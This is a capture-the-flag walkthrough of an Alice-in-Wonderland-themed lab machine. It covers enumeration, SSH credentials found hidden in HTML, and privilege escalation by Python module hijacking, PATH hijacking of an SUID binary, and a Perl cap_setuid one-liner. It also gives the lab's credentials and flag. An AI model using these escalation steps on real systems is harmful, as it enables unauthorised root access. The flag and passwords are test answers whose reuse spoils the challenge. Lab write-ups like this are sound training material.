# Tasks
* user.txt
* root.txt


# NMAP SCAN
```nmap
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

Let's check out the web server.
It tells us to follow the white rabbit which an image of a rabbit, maybe a stego challenge? Checking robots.txt it doesn't exist, let's run ffuf

# FFUF
```bash
img                     [Status: 301, Size: 0, Words: 1, Lines: 1]
poem                    [Status: 301, Size: 0, Words: 1, Lines: 1]
r                       [Status: 301, Size: 0, Words: 1, Lines: 1]
```
Poem brings us to a poem, maybe we can use that for a wordlist?
img has three image files that might be stego challenges.
and r tells us to keep going? And I thought perhaps it's spelling rabbit? Let's try /a after r.
And it is!
Let's try to navigate to http://10.10.10.182.211/r/a/b/b/i/t
```md
# Open the door and enter wonderland
````
Hm the directoring listing of img has a few images saying 'door'. Let's grab those and see.
So now we have alice_door.jpg, alice_door.png and white_rabbit1.jpg.

Let's use binwalk and steghide to see if anything is hidden inside the file.

# Binwalk
Let's do alice_door.jpg first.
```bash
DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
0             0x0             JPEG image data, JFIF standard 1.02
30            0x1E            TIFF image data, big-endian, offset of first image directory: 8
332           0x14C           JPEG image data, JFIF standard 1.02
12721         0x31B1          XML document, version: "1.0"
21743         0x54EF          JPEG image data, JFIF standard 1.02
```
A lot of stuff in there let's extract them.
Can't seem to extract it, let's move on to alice_door.png
```bash
DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
0             0x0             PNG image, 1962 x 1942, 8-bit/color RGBA, non-interlaced
91            0x5B            Zlib compressed data, compressed
```
Ooh, a compressed zip file in it. Let's extract it.
Okay we have .zlib file. 
After numerous attempts to extract it, I indeed fell into a rabbit hole and wasted time.
Moving back a bit I checked out the source code for the last page we arrived.
```html
<p style="display: none;">alice:HowDothTheLittleCrocodileImproveHisShiningTail</p>
```
Looks like SSH credentials, was hiding here all along.
Let's SSH in.
Weirdly enough root.txt is in alice's home directory? But user.txt isn't, checking out the hint, it said the everything is upside down, so user.txt is in /root?

It won't wont auto-complete so you have to just type it out and:
```bash
thm{"Curiouser and curiouser!"}
```
Great. Now just to root.

# Privesc

Checking out sudo -l
```bash
Matching Defaults entries for alice on wonderland:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User alice may run the following commands on wonderland:
    (rabbit) /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py
```
We can run it on a python file as user rabbit.
Checking out the python file, it's a long string of poem and it chooses a random line from it.
```py
import random
for i in range(10):
    line = random.choice(poem.split("\n"))
    print("The line was:\t", line)
```
So it's choosing random lines with the random module. A module is python is just a .py file.
What if we put our random.py in the same directory as it? 
```py
import os
os.system("/bin/bash")
```
Now let's run the file as user rabbit, for this use sudo -u.
And now we're user rabbit!
Let's check out his directory.
There's a binary named 'teaParty' with SUID bit. Let's check it out.
```txt
Welcome to the tea party!
The Mad Hatter will be here soon.
Probably by Sat, 07 Aug 2021 14:23:59 +0000
Ask very nicely, and I will give you some tea while you wait for him
```
Since strings is not installed, let's wget this into our attack machine.
One thing that is interesting is this.
```bash
The Mad Hatter will be here soon.                                                                                                                                                                                  
/bin/echo -n 'Probably by ' && date --date='next hour' -R 
```
See how echo is using it's absolute path? But check out date, it's not using it's absolute path, which means we could do some path hijacking or whatever you call it.
If search for date using which it'll output : 
```bash
/bin/date
```
Let's see what is rabbit's $PATH.
```bash
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
```
So $PATH basically tells the shell which directory look for executable in our case (./) 
And since /bin is like almost at the end we can append something at the beginning.
So let's make our 'version' of date.
I tried making it change to /bin/bash as SUID bit looks like it's not running as root but running as user hatter.
Guess we'll make it spawn a shell for user hatter.
```bash
#!/bin/bash
/bin/bash
```
Now we're user hatter.
Checking out his home there is a password.txt
```txt
WhyIsARavenLikeAWritingDesk?
```
Trying out sudo -l and he may not run sudo.
But one thing we can do is SSH in as user hatter for a better shell.
That should be the last user we can get into.
Let's run linpeas and some commands to get SUID and capabilities.
```bash
find / -perm -u=s -type f 2>/dev/null 
```
Everything looks at place but one doesn't
```bash
/usr/bin/perl5.26.1 = cap_setuid+ep
```
Let's check out GTFObins for this.
```txt
If the binary has the Linux `CAP_SETUID` capability set or it is executed by another binary with the capability set, it can be used as a backdoor to maintain privileged access by manipulating its own process UID.
```
Let's try this and edit it to our use.
```bash
./perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'
```

```bash
/usr/bin/perl5.26.1 -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'
```
And we're root and we solved the machine!








